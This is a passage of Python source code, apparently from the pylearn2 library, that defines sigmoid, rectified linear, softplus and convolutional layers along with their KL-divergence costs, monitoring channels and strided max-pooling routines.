Y_hat must be generated by fprop, i.e., it must be a symbolic
sigmoid.
p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q)
For binary p, some terms drop out:
- p log q - (1-p) log (1-q)
- p log sigmoid(z) - (1-p) log sigmoid(-z)
p softplus(-z) + (1-p) softplus(z)
"""
total = self.kl(Y=Y, Y_hat=Y_hat)
ave = total.mean()
return ave
def kl(self, Y, Y_hat):
"""
Computes the KL divergence.
Parameters
----------
Y : Variable
targets for the sigmoid outputs. Currently Y must be purely binary.
If it's not, you'll still get the right gradient, but the
value in the monitoring channel will be wrong.
Y_hat : Variable
predictions made by the sigmoid layer. Y_hat must be generated by
fprop, i.e., it must be a symbolic sigmoid.
Returns
-------
ave : Variable
average kl divergence between Y and Y_hat.
Notes
-----
Warning: This function expects a sigmoid nonlinearity in the
output layer and it uses kl function under pylearn2/expr/nnet/.
Returns a batch (vector) of mean across units of KL
divergence for each example,
KL(P || Q) where P is defined by Y and Q is defined by Y_hat:
p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q)
For binary p, some terms drop out:
- p log q - (1-p) log (1-q)
- p log sigmoid(z) - (1-p) log sigmoid(-z)
p softplus(-z) + (1-p) softplus(z)
"""
batch_axis = self.output_space.get_batch_axis()
div = kl(Y=Y, Y_hat=Y_hat, batch_axis=batch_axis)
return div
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
rval = elemwise_kl(Y, Y_hat)
assert rval.ndim == 2
return rval
def get_detection_channels_from_state(self, state, target):
"""
Returns monitoring channels when using the layer to do detection
of binary events.
Parameters
----------
state : theano.gof.Variable
Output of `fprop`
target : theano.gof.Variable
The targets from the dataset
Returns
-------
channels : OrderedDict
Dictionary mapping channel names to Theano channel values.
"""
rval = OrderedDict()
y_hat = state > 0.5
y = target > 0.5
wrong_bit = T.cast(T.neq(y, y_hat), state.dtype)
rval['01_loss'] = wrong_bit.mean()
rval['kl'] = self.cost(Y_hat=state, Y=target)
y = T.cast(y, state.dtype)
y_hat = T.cast(y_hat, state.dtype)
tp = (y * y_hat).sum()
fp = ((1 - y) * y_hat).sum()
precision = compute_precision(tp, fp)
recall = compute_recall(y, tp)
f1 = compute_f1(precision, recall)
rval['precision'] = precision
rval['recall'] = recall
rval['f1'] = f1
tp = (y * y_hat).sum(axis=0)
fp = ((1 - y) * y_hat).sum(axis=0)
precision = compute_precision(tp, fp)
rval['per_output_precision_max'] = precision.max()
rval['per_output_precision_mean'] = precision.mean()
rval['per_output_precision_min'] = precision.min()
recall = compute_recall(y, tp)
rval['per_output_recall_max'] = recall.max()
rval['per_output_recall_mean'] = recall.mean()
rval['per_output_recall_min'] = recall.min()
f1 = compute_f1(precision, recall)
rval['per_output_f1_max'] = f1.max()
rval['per_output_f1_mean'] = f1.mean()
rval['per_output_f1_min'] = f1.min()
return rval
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = super(Sigmoid, self).get_layer_monitoring_channels(
state=state, targets=targets)
if (targets is not None) and \
((state_below is not None) or (state is not None)):
if state is None:
state = self.fprop(state_below)
if self.monitor_style == 'detection':
rval.update(self.get_detection_channels_from_state(state,
targets))
elif self.monitor_style == 'one_hot_class':
# For this monitor style, we know (by assumption) that
# exactly one bit is always on, so we pick
# the single most likely bit under the model, regardless
# of whether its probability exceeds 0.5
prediction = state.argmax(axis=1)
labels = targets.argmax(axis=1)
incorrect = T.neq(prediction, labels)
misclass = T.cast(incorrect, config.floatX).mean()
rval['misclass'] = misclass
else:
assert self.monitor_style == 'bit_vector_class'
# Threshold Y_hat at 0.5.
prediction = T.gt(state, 0.5)
# If even one feature is wrong for a given training example,
# it's considered incorrect, so we max over columns.
incorrect = T.neq(targets, prediction).max(axis=1)
rval['misclass'] = T.cast(incorrect, config.floatX).mean()
return rval
class RectifiedLinear(Linear):
"""
Rectified linear MLP layer (Glorot and Bengio 2011).
Parameters
----------
left_slope : float
The slope the line should have left of 0.
kwargs : dict
Keyword arguments to pass to `Linear` class constructor.
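    Examples
    --------
    An illustrative sketch; a nonzero `left_slope` gives a "leaky"
    rectifier (the values are arbitrary):
    >>> from pylearn2.models.mlp import RectifiedLinear
    >>> h0 = RectifiedLinear(layer_name='h0', dim=500, irange=0.05)
    >>> h1 = RectifiedLinear(layer_name='h1', dim=500, irange=0.05,
    ...                      left_slope=0.01)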
"""
def __init__(self, left_slope=0.0, **kwargs):
super(RectifiedLinear, self).__init__(**kwargs)
self.left_slope = left_slope
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
# Original: p = p * (p > 0.) + self.left_slope * p * (p < 0.)
# T.switch is faster.
# For details, see benchmarks in
# pylearn2/scripts/benchmark/time_relu.py
p = T.switch(p > 0., p, self.left_slope * p)
return p
@wraps(Layer.cost)
def cost(self, *args, **kwargs):
raise NotImplementedError()
class Softplus(Linear):
"""
An MLP layer using the softplus nonlinearity
h = log(1 + exp(Wx + b))
Parameters
----------
kwargs : dict
Keyword arguments to `Linear` constructor.
"""
def __init__(self, **kwargs):
super(Softplus, self).__init__(**kwargs)
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
p = T.nnet.softplus(p)
return p
@wraps(Layer.cost)
def cost(self, *args, **kwargs):
raise NotImplementedError()
class SpaceConverter(Layer):
"""
A Layer with no parameters that converts the input from
one space to another.
Parameters
----------
layer_name : str
Name of the layer.
output_space : Space
The space to convert to.
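    Examples
    --------
    An illustrative sketch that flattens a topological input into a
    vector (the shape is an arbitrary choice):
    >>> from pylearn2.models.mlp import SpaceConverter
    >>> from pylearn2.space import VectorSpace
    >>> flatten = SpaceConverter(layer_name='flatten',
    ...                          output_space=VectorSpace(dim=28 * 28))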
"""
def __init__(self, layer_name, output_space):
super(SpaceConverter, self).__init__()
self.__dict__.update(locals())
del self.self
self._params = []
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
@wraps(Layer.fprop)
def fprop(self, state_below):
return self.input_space.format_as(state_below, self.output_space)
class ConvNonlinearity(object):
"""
Abstract convolutional nonlinearity class.
"""
def apply(self, linear_response):
"""
Applies the nonlinearity over the convolutional layer.
Parameters
----------
linear_response: Variable
linear response of the layer.
Returns
-------
p: Variable
the response of the layer after the activation function
is applied over.
"""
p = linear_response
return p
def _get_monitoring_channels_for_activations(self, state):
"""
Computes the monitoring channels which does not require targets.
Parameters
----------
state : member of self.output_space
A minibatch of states that this Layer took on during fprop.
Provided externally so that we don't need to make a second
expression for it. This helps keep the Theano graph smaller
so that function compilation runs faster.
Returns
-------
rval : OrderedDict
A dictionary mapping channel names to monitoring channels of
interest for this layer.
"""
rval = OrderedDict({})
mx = state.max(axis=0)
mean = state.mean(axis=0)
mn = state.min(axis=0)
rg = mx - mn
rval['range_x_max_u'] = rg.max()
rval['range_x_mean_u'] = rg.mean()
rval['range_x_min_u'] = rg.min()
rval['max_x_max_u'] = mx.max()
rval['max_x_mean_u'] = mx.mean()
rval['max_x_min_u'] = mx.min()
rval['mean_x_max_u'] = mean.max()
rval['mean_x_mean_u'] = mean.mean()
rval['mean_x_min_u'] = mean.min()
rval['min_x_max_u'] = mn.max()
rval['min_x_mean_u'] = mn.mean()
rval['min_x_min_u'] = mn.min()
return rval
def get_monitoring_channels_from_state(self, state, target,
cost_fn=None):
"""
Override the default get_monitoring_channels_from_state function.
Parameters
----------
state : member of self.output_space
A minibatch of states that this Layer took on during fprop.
Provided externally so that we don't need to make a second
expression for it. This helps keep the Theano graph smaller
so that function compilation runs faster.
target : member of self.output_space
Should be None unless this is the last layer.
If specified, it should be a minibatch of targets for the
last layer.
cost_fn : theano computational graph or None
This is the theano computational graph of a cost function.
Returns
-------
rval : OrderedDict
A dictionary mapping channel names to monitoring channels of
interest for this layer.
"""
rval = self._get_monitoring_channels_for_activations(state)
return rval
class IdentityConvNonlinearity(ConvNonlinearity):
"""
Linear convolutional nonlinearity class.
"""
def __init__(self):
self.non_lin_name = "linear"
@wraps(ConvNonlinearity.get_monitoring_channels_from_state)
def get_monitoring_channels_from_state(self,
state,
target,
cost_fn=False):
rval = super(IdentityConvNonlinearity,
self).get_monitoring_channels_from_state(state,
target,
cost_fn)
if target is not None:
prediction = T.gt(state, 0.5)
            incorrect = T.neq(target, prediction).max(axis=1)
rval["misclass"] = T.cast(incorrect, config.floatX).mean()
return rval
class RectifierConvNonlinearity(ConvNonlinearity):
"""
A simple rectifier nonlinearity class for convolutional layers.
Parameters
----------
left_slope : float
The slope of the left half of the activation function.
"""
def __init__(self, left_slope=0.0):
"""
Parameters
----------
left_slope : float, optional
left slope for the linear response of the rectifier function.
default is 0.0.
"""
self.non_lin_name = "rectifier"
self.left_slope = left_slope
@wraps(ConvNonlinearity.apply)
def apply(self, linear_response):
"""
Applies the rectifier nonlinearity over the convolutional layer.
"""
p = linear_response * (linear_response > 0.) + self.left_slope *\
linear_response * (linear_response < 0.)
return p
class SigmoidConvNonlinearity(ConvNonlinearity):
"""
Sigmoid nonlinearity class for convolutional layers.
Parameters
----------
monitor_style : str, optional
default monitor_style is "classification".
This determines whether to do classification or detection.
"""
def __init__(self, monitor_style="classification"):
assert monitor_style in ['classification', 'detection']
self.monitor_style = monitor_style
self.non_lin_name = "sigmoid"
@wraps(ConvNonlinearity.apply)
def apply(self, linear_response):
"""
Applies the sigmoid nonlinearity over the convolutional layer.
"""
rval = OrderedDict()
p = T.nnet.sigmoid(linear_response)
return p
@wraps(ConvNonlinearity.get_monitoring_channels_from_state)
def get_monitoring_channels_from_state(self, state, target,
cost_fn=None):
rval = super(SigmoidConvNonlinearity,
self).get_monitoring_channels_from_state(state,
target,
cost_fn)
if target is not None:
y_hat = state > 0.5
y = target > 0.5
wrong_bit = T.cast(T.neq(y, y_hat), state.dtype)
rval['01_loss'] = wrong_bit.mean()
rval['kl'] = cost_fn(Y_hat=state, Y=target)
y = T.cast(y, state.dtype)
y_hat = T.cast(y_hat, state.dtype)
tp = (y * y_hat).sum()
fp = ((1 - y) * y_hat).sum()
precision = compute_precision(tp, fp)
recall = compute_recall(y, tp)
f1 = compute_f1(precision, recall)
rval['precision'] = precision
rval['recall'] = recall
rval['f1'] = f1
tp = (y * y_hat).sum(axis=[0, 1])
fp = ((1 - y) * y_hat).sum(axis=[0, 1])
precision = compute_precision(tp, fp)
rval['per_output_precision_max'] = precision.max()
rval['per_output_precision_mean'] = precision.mean()
rval['per_output_precision_min'] = precision.min()
recall = compute_recall(y, tp)
rval['per_output_recall_max'] = recall.max()
rval['per_output_recall_mean'] = recall.mean()
rval['per_output_recall_min'] = recall.min()
f1 = compute_f1(precision, recall)
rval['per_output_f1_max'] = f1.max()
rval['per_output_f1_mean'] = f1.mean()
rval['per_output_f1_min'] = f1.min()
return rval
class TanhConvNonlinearity(ConvNonlinearity):
"""
Tanh nonlinearity class for convolutional layers.
"""
def __init__(self):
self.non_lin_name = "tanh"
@wraps(ConvNonlinearity.apply)
def apply(self, linear_response):
"""
Applies the tanh nonlinearity over the convolutional layer.
"""
p = T.tanh(linear_response)
return p
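# Illustrative sketch (assumption, not original code): a new convolutional
# nonlinearity for ConvElemwise only needs a `non_lin_name` attribute and an
# `apply` method, e.g. an absolute-value rectifier:
#
#   class AbsConvNonlinearity(ConvNonlinearity):
#       def __init__(self):
#           self.non_lin_name = "abs"
#
#       def apply(self, linear_response):
#           return abs(linear_response)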
class ConvElemwise(Layer):
"""
Generic convolutional elemwise layer.
Takes the ConvNonlinearity object as an argument and implements
convolutional layer with the specified nonlinearity.
This function can implement:
* Linear convolutional layer
* Rectifier convolutional layer
* Sigmoid convolutional layer
* Tanh convolutional layer
    based on the nonlinearity argument that it receives.
Parameters
----------
output_channels : int
The number of output channels the layer should have.
kernel_shape : tuple
The shape of the convolution kernel.
pool_shape : tuple
The shape of the spatial max pooling. A two-tuple of ints.
pool_stride : tuple
The stride of the spatial max pooling. Also must be square.
layer_name : str
A name for this layer that will be prepended to monitoring channels
related to this layer.
nonlinearity : object
An instance of a nonlinearity object which might be inherited
from the ConvNonlinearity class.
irange : float, optional
if specified, initializes each weight randomly in
U(-irange, irange)
border_mode : str, optional
A string indicating the size of the output:
- "full" : The output is the full discrete linear convolution of the
inputs.
- "valid" : The output consists only of those elements that do not
rely on the zero-padding. (Default)
    sparse_init : int, optional
        If specified, each kernel is initialized with this many nonzero
        entries; `sparse_init` and `irange` are mutually exclusive.
include_prob : float, optional
probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is initialized
to 1.0.
init_bias : float, optional
All biases are initialized to this number. Default is 0.
W_lr_scale : float or None
The learning rate on the weights for this layer is multiplied by this
scaling factor
b_lr_scale : float or None
The learning rate on the biases for this layer is multiplied by this
scaling factor
max_kernel_norm : float or None
If specified, each kernel is constrained to have at most this norm.
    pool_type : str or None
        The type of spatial pooling performed after the convolution,
        either 'max' or 'mean'. If None (the default), no pooling is
        applied.
tied_b : bool, optional
If true, all biases in the same channel are constrained to be the
same as each other. Otherwise, each bias at each location is
learned independently. Default is true.
detector_normalization : callable or None
See `output_normalization`.
If pooling argument is not provided, detector_normalization
is not applied on the layer.
output_normalization : callable or None
if specified, should be a callable object. the state of the
network is optionally replaced with normalization(state) at each
of the 3 points in processing:
        - detector: the detector units can be normalized prior to the
          spatial pooling
        - output: the output of the layer, after spatial pooling, can
          be normalized as well
kernel_stride : 2-tuple of ints, optional
The stride of the convolution kernel. Default is (1, 1).
"""
def __init__(self,
output_channels,
kernel_shape,
layer_name,
nonlinearity,
irange=None,
border_mode='valid',
sparse_init=None,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
max_kernel_norm=None,
pool_type=None,
pool_shape=None,
pool_stride=None,
tied_b=None,
detector_normalization=None,
output_normalization=None,
kernel_stride=(1, 1),
monitor_style="classification"):
super(ConvElemwise, self).__init__()
if (irange is None) and (sparse_init is None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvElemwise.")
elif (irange is not None) and (sparse_init is not None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvElemwise and not both.")
if pool_type is not None:
assert pool_shape is not None, (
"You should specify the shape of "
"the spatial %s-pooling." % pool_type)
assert pool_stride is not None, (
"You should specify the strides of "
"the spatial %s-pooling." % pool_type)
assert nonlinearity is not None
self.nonlin = nonlinearity
self.__dict__.update(locals())
assert monitor_style in ['classification', 'detection'], (
"%s.monitor_style should be either"
"detection or classification" % self.__class__.__name__)
del self.self
def initialize_transformer(self, rng):
"""
This function initializes the transformer of the class. Re-running
this function will reset the transformer.
Parameters
----------
rng : object
random number generator object.
"""
if self.irange is not None:
assert self.sparse_init is None
self.transformer = conv2d.make_random_conv2D(
irange=self.irange,
input_space=self.input_space,
output_space=self.detector_space,
kernel_shape=self.kernel_shape,
subsample=self.kernel_stride,
border_mode=self.border_mode,
rng=rng)
elif self.sparse_init is not None:
self.transformer = conv2d.make_sparse_random_conv2D(
num_nonzero=self.sparse_init,
input_space=self.input_space,
output_space=self.detector_space,
kernel_shape=self.kernel_shape,
subsample=self.kernel_stride,
border_mode=self.border_mode,
rng=rng)
def initialize_output_space(self):
"""
Initializes the output space of the ConvElemwise layer by taking
pooling operator and the hyperparameters of the convolutional layer
into consideration as well.
"""
dummy_batch_size = self.mlp.batch_size
if dummy_batch_size is None:
dummy_batch_size = 2
dummy_detector =\
sharedX(self.detector_space.get_origin_batch(dummy_batch_size))
if self.pool_type is not None:
assert self.pool_type in ['max', 'mean']
if self.pool_type == 'max':
dummy_p = max_pool(bc01=dummy_detector,
pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
elif self.pool_type == 'mean':
dummy_p = mean_pool(bc01=dummy_detector,
pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
dummy_p = dummy_p.eval()
self.output_space = Conv2DSpace(shape=[dummy_p.shape[2],
dummy_p.shape[3]],
num_channels=self.output_channels,
axes=('b', 'c', 0, 1))
else:
dummy_detector = dummy_detector.eval()
self.output_space = Conv2DSpace(shape=[dummy_detector.shape[2],
dummy_detector.shape[3]],
num_channels=self.output_channels,
axes=('b', 'c', 0, 1))
logger.info('Output space: {0}'.format(self.output_space.shape))
@wraps(Layer.set_input_space)
def set_input_space(self, space):
""" Note: this function will reset the parameters! """
self.input_space = space
if not isinstance(space, Conv2DSpace):
raise BadInputSpaceError(self.__class__.__name__ +
".set_input_space "
"expected a Conv2DSpace, got " +
str(space) + " of type " +
str(type(space)))
rng = self.mlp.rng
if self.border_mode == 'valid':
output_shape = [int((self.input_space.shape[0]
- self.kernel_shape[0])
/ self.kernel_stride[0]) + 1,
int((self.input_space.shape[1]
- self.kernel_shape[1])
/ self.kernel_stride[1]) + 1]
elif self.border_mode == 'full':
output_shape = [int((self.input_space.shape[0]
+ self.kernel_shape[0])
/ self.kernel_stride[0]) - 1,
int((self.input_space.shape[1]
+ self.kernel_shape[1])
/ self.kernel_stride[1]) - 1]
self.detector_space = Conv2DSpace(shape=output_shape,
num_channels=self.output_channels,
axes=('b', 'c', 0, 1))
self.initialize_transformer(rng)
W, = self.transformer.get_params()
W.name = self.layer_name + '_W'
if self.tied_b:
self.b = sharedX(np.zeros((self.detector_space.num_channels)) +
self.init_bias)
else:
self.b = sharedX(self.detector_space.get_origin() + self.init_bias)
self.b.name = self.layer_name + '_b'
logger.info('Input shape: {0}'.format(self.input_space.shape))
logger.info('Detector space: {0}'.format(self.detector_space.shape))
self.initialize_output_space()
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.max_kernel_norm is not None:
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=(1, 2, 3)))
desired_norms = T.clip(row_norms, 0, self.max_kernel_norm)
updates[W] = updated_W * (
desired_norms /
(1e-7 + row_norms)).dimshuffle(0, 'x', 'x', 'x')
@wraps(Layer.get_params)
def get_params(self):
assert self.b.name is not None
W, = self.transformer.get_params()
assert W.name is not None
rval = self.transformer.get_params()
assert not isinstance(rval, set)
rval = list(rval)
assert self.b not in rval
rval.append(self.b)
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * T.sqr(W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * abs(W).sum()
@wraps(Layer.set_weights)
def set_weights(self, weights):
W, = self.transformer.get_params()
W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
if not hasattr(self, 'W_lr_scale'):
self.W_lr_scale = None
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
rval = OrderedDict()
if self.W_lr_scale is not None:
W, = self.transformer.get_params()
rval[W] = self.W_lr_scale
if self.b_lr_scale is not None:
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
outp, inp, rows, cols = range(4)
raw = self.transformer._filters.get_value()
return np.transpose(raw, (outp, rows, cols, inp))
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
W, = self.transformer.get_params()
assert W.ndim == 4
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=(1, 2, 3)))
rval = OrderedDict([
('kernel_norms_min', row_norms.min()),
('kernel_norms_mean', row_norms.mean()),
('kernel_norms_max', row_norms.max()),
])
cst = self.cost
orval = self.nonlin.get_monitoring_channels_from_state(state,
targets,
cost_fn=cst)
rval.update(orval)
return rval
@wraps(Layer.fprop)
def fprop(self, state_below):
self.input_space.validate(state_below)
z = self.transformer.lmul(state_below)
if not hasattr(self, 'tied_b'):
self.tied_b = False
if self.tied_b:
b = self.b.dimshuffle('x', 0, 'x', 'x')
else:
b = self.b.dimshuffle('x', 0, 1, 2)
z = z + b
d = self.nonlin.apply(z)
if self.layer_name is not None:
d.name = self.layer_name + '_z'
self.detector_space.validate(d)
if self.pool_type is not None:
if not hasattr(self, 'detector_normalization'):
self.detector_normalization = None
if self.detector_normalization:
d = self.detector_normalization(d)
            assert self.pool_type in ['max', 'mean'], ("pool_type should be "
                                                       "either max or mean "
                                                       "pooling.")
if self.pool_type == 'max':
p = max_pool(bc01=d, pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
elif self.pool_type == 'mean':
p = mean_pool(bc01=d, pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
self.output_space.validate(p)
else:
p = d
if not hasattr(self, 'output_normalization'):
self.output_normalization = None
if self.output_normalization:
p = self.output_normalization(p)
return p
def cost(self, Y, Y_hat):
"""
Cost for convnets is hardcoded to be the cost for sigmoids.
TODO: move the cost into the non-linearity class.
Parameters
----------
Y : theano.gof.Variable
Output of `fprop`
Y_hat : theano.gof.Variable
Targets
Returns
-------
cost : theano.gof.Variable
0-D tensor describing the cost
Notes
-----
Cost mean across units, mean across batch of KL divergence
KL(P || Q) where P is defined by Y and Q is defined by Y_hat
KL(P || Q) = p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q)
"""
assert self.nonlin.non_lin_name == "sigmoid", ("ConvElemwise "
"supports "
"cost function "
"for only "
"sigmoid layer "
"for now.")
batch_axis = self.output_space.get_batch_axis()
ave_total = kl(Y=Y, Y_hat=Y_hat, batch_axis=batch_axis)
ave = ave_total.mean()
return ave
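# Illustrative sketch (assumption, not original code): a ConvElemwise layer is
# built by pairing it with one of the nonlinearity objects defined above; the
# hyperparameters below are placeholders.
#
#   layer = ConvElemwise(output_channels=16,
#                        kernel_shape=(5, 5),
#                        layer_name='h0',
#                        nonlinearity=SigmoidConvNonlinearity(),
#                        irange=0.05,
#                        pool_type='max',
#                        pool_shape=(2, 2),
#                        pool_stride=(2, 2))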
class ConvRectifiedLinear(ConvElemwise):
"""
A convolutional rectified linear layer, based on theano's B01C
formatted convolution.
Parameters
----------
output_channels : int
The number of output channels the layer should have.
kernel_shape : tuple
The shape of the convolution kernel.
pool_shape : tuple
The shape of the spatial max pooling. A two-tuple of ints.
pool_stride : tuple
The stride of the spatial max pooling. Also must be square.
layer_name : str
A name for this layer that will be prepended to monitoring channels
related to this layer.
irange : float
if specified, initializes each weight randomly in
U(-irange, irange)
border_mode : str
A string indicating the size of the output:
- "full" : The output is the full discrete linear convolution of the
inputs.
- "valid" : The output consists only of those elements that do not
rely on the zero-padding. (Default)
include_prob : float
probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is initialized
to 0.
init_bias : float
All biases are initialized to this number
W_lr_scale : float
The learning rate on the weights for this layer is multiplied by this
scaling factor
b_lr_scale : float
The learning rate on the biases for this layer is multiplied by this
scaling factor
left_slope : float
The slope of the left half of the activation function
max_kernel_norm : float
        If specified, each kernel is constrained to have at most this norm.
    pool_type : str, optional
        The type of the pooling operation performed after the convolution.
        Default pooling type is max-pooling.
tied_b : bool
If true, all biases in the same channel are constrained to be the
same as each other. Otherwise, each bias at each location is
learned independently.
detector_normalization : callable
See `output_normalization`
output_normalization : callable
if specified, should be a callable object. the state of the
network is optionally replaced with normalization(state) at each
of the 3 points in processing:
- detector: the rectifier units can be normalized prior to the
spatial pooling
- output: the output of the layer, after spatial pooling, can
be normalized as well
kernel_stride : tuple
The stride of the convolution kernel. A two-tuple of ints.
"""
def __init__(self,
output_channels,
kernel_shape,
pool_shape,
pool_stride,
layer_name,
irange=None,
border_mode='valid',
sparse_init=None,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
left_slope=0.0,
max_kernel_norm=None,
pool_type='max',
tied_b=False,
detector_normalization=None,
output_normalization=None,
kernel_stride=(1, 1),
monitor_style="classification"):
nonlinearity = RectifierConvNonlinearity(left_slope)
if (irange is None) and (sparse_init is None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvRectifiedLinear.")
elif (irange is not None) and (sparse_init is not None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvRectifiedLinear and not both.")
# Alias the variables for pep8
mkn = max_kernel_norm
dn = detector_normalization
on = output_normalization
super(ConvRectifiedLinear, self).__init__(output_channels,
kernel_shape,
layer_name,
nonlinearity,
irange=irange,
border_mode=border_mode,
sparse_init=sparse_init,
include_prob=include_prob,
init_bias=init_bias,
W_lr_scale=W_lr_scale,
b_lr_scale=b_lr_scale,
pool_shape=pool_shape,
pool_stride=pool_stride,
max_kernel_norm=mkn,
pool_type=pool_type,
tied_b=tied_b,
detector_normalization=dn,
output_normalization=on,
kernel_stride=kernel_stride,
monitor_style=monitor_style)
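# Illustrative sketch (assumption, not original code): a ConvRectifiedLinear
# layer inside an MLP operating on 28x28 single-channel images; all sizes are
# placeholders.
#
#   mlp = MLP(batch_size=100,
#             input_space=Conv2DSpace(shape=[28, 28], num_channels=1),
#             layers=[ConvRectifiedLinear(output_channels=16,
#                                         kernel_shape=(5, 5),
#                                         pool_shape=(2, 2),
#                                         pool_stride=(2, 2),
#                                         layer_name='h0',
#                                         irange=0.05),
#                     Softmax(n_classes=10, layer_name='y', irange=0.05)])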
def pool_dnn(bc01, pool_shape, pool_stride, mode='max'):
"""
cuDNN pooling op.
Parameters
----------
bc01 : theano tensor
Minibatch in format (batch size, channels, rows, cols).
pool_shape : tuple
Shape of the pool region (rows, cols).
pool_stride : tuple
Strides between pooling regions (row stride, col stride).
mode : str
Flag for `mean` or `max` pooling.
Returns
-------
mx : theano tensor
The output of pooling applied to `bc01`.
"""
assert mode in ['max', 'mean']
if mode == 'mean':
raise NotImplementedError('Mean pooling is not implemented '
'in Pylearn2 using cuDNN as of '
'January 19th, 2015.')
mx = dnn_pool(bc01, tuple(pool_shape), tuple(pool_stride), mode)
return mx
def max_pool(bc01, pool_shape, pool_stride, image_shape, try_dnn=True):
"""
Theano's max pooling op only supports pool_stride = pool_shape
so here we have a graph that does max pooling with strides
Parameters
----------
bc01 : theano tensor
minibatch in format (batch size, channels, rows, cols)
pool_shape : tuple
shape of the pool region (rows, cols)
pool_stride : tuple
strides between pooling regions (row stride, col stride)
image_shape : tuple
avoid doing some of the arithmetic in theano
try_dnn : bool
Flag to set cuDNN use (default: True).
Returns
-------
pooled : theano tensor
The output of pooling applied to `bc01`
See Also
--------
max_pool_c01b : Same functionality but with ('c', 0, 1, 'b') axes
sandbox.cuda_convnet.pool.max_pool_c01b : Same functionality as
`max_pool_c01b` but GPU-only and considerably faster.
mean_pool : Mean pooling instead of max pooling
"""
mx = None
r, c = image_shape
pr, pc = pool_shape
rs, cs = pool_stride
assert pr <= r
assert pc <= c
name = bc01.name
if name is None:
name = 'anon_bc01'
if try_dnn and bc01.dtype == "float32":
use_dnn = dnn_available()
else:
use_dnn = False
if pool_shape == pool_stride and not use_dnn:
mx = max_pool_2d(bc01, pool_shape, False)
mx.name = 'max_pool(' + name + ')'
return mx
# Compute index in pooled space of last needed pool
# (needed = each input pixel must appear in at least one pool)
def last_pool(im_shp, p_shp, p_strd):
rval = int(np.ceil(float(im_shp - p_shp) / p_strd))
assert p_strd * rval + p_shp >= im_shp
assert p_strd * (rval - 1) + p_shp < im_shp
# Catch case where p_strd > p_shp causes pool
# to be set outside of im_shp.
if p_strd * rval >= im_shp:
rval -= 1
return rval
# Compute starting row of the last pool
last_pool_r = last_pool(image_shape[0],
pool_shape[0],
pool_stride[0]) * pool_stride[0]
# Compute number of rows needed in image for all indexes to work out
required_r = last_pool_r + pr
last_pool_c = last_pool(image_shape[1],
pool_shape[1],
pool_stride[1]) * pool_stride[1]
required_c = last_pool_c + pc
for bc01v in get_debug_values(bc01):
assert not contains_inf(bc01v)
assert bc01v.shape[2] == image_shape[0]
assert bc01v.shape[3] == image_shape[1]
if (required_r > r) or (required_c > c):
small_r = min(required_r, r)
small_c = min(required_c, c)
assert bc01.dtype.startswith('float')
wide_infinity = T.alloc(T.constant(-np.inf, dtype=bc01.dtype),
bc01.shape[0],
bc01.shape[1],
required_r,
required_c)
bc01 = T.set_subtensor(wide_infinity[:, :, 0:small_r, 0:small_c],
bc01[:, :, 0:small_r, 0:small_c])
name = 'infinite_padded_' + name
if use_dnn:
mx = pool_dnn(bc01, pool_shape, pool_stride, 'max')
else:
for row_within_pool in xrange(pool_shape[0]):
row_stop = last_pool_r + row_within_pool + 1
for col_within_pool in xrange(pool_shape[1]):
col_stop = last_pool_c + col_within_pool + 1
cur = bc01[:,
:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs]
cur.name = ('max_pool_cur_' + name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
if mx is None:
mx = cur
else:
mx = T.maximum(mx, cur)
mx.name = ('max_pool_mx_' + name + '_' +
str(row_within_pool) + '_' +
str(col_within_pool))
mx.name = 'max_pool(' + name + ')'
for mxv in get_debug_values(mx):
assert isfinite(mxv)
return mx
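# Illustrative sketch (assumption, not original code): strided max pooling over
# a 4D (batch, channel, rows, cols) tensor, analogous to the mean_pool doctest
# further below.
#
#   import theano
#   X_sym = T.tensor4('X')
#   pooled = max_pool(bc01=X_sym, pool_shape=(2, 2), pool_stride=(2, 2),
#                     image_shape=(6, 4), try_dnn=False)
#   f = theano.function([X_sym], pooled)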
